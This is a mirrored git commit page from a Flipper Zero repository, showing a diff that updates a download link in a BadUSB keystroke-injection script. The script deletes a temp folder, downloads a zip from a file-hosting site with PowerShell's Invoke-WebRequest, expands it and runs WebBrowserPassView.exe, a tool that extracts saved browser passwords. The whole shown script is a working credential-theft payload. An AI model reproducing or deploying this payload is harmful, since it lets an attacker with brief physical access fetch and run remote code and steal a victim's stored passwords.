mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-21 14:00:13 +00:00
Fixed broken link (thanks jbohack!)
This commit is contained in:
parent
7b1466ffbc
commit
ff9c98f7e2
@ -8,7 +8,7 @@ DELAY 1000
|
||||
STRING rmdir -R \temp
|
||||
ENTER
|
||||
DELAY 1000
|
||||
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/webpassview.zip -OutFile webpassview.zip ; Invoke-WebRequest -Uri https://cdn.lullaby.cafe/file/7z.zip -OutFile 7z.zip ; Expand-Archive 7z.zip ; .\7z\7za.exe e webpassview.zip
|
||||
STRING mkdir \temp ; cd \temp ; Invoke-WebRequest -Uri https://files.catbox.moe/iqlnan.zip -OutFile webpassview.zip ; Expand-Archive webpassview.zip
|
||||
ENTER
|
||||
STRING .\WebBrowserPassView.exe
|
||||
ENTER
|
Loading…
Reference in New Issue
Block a user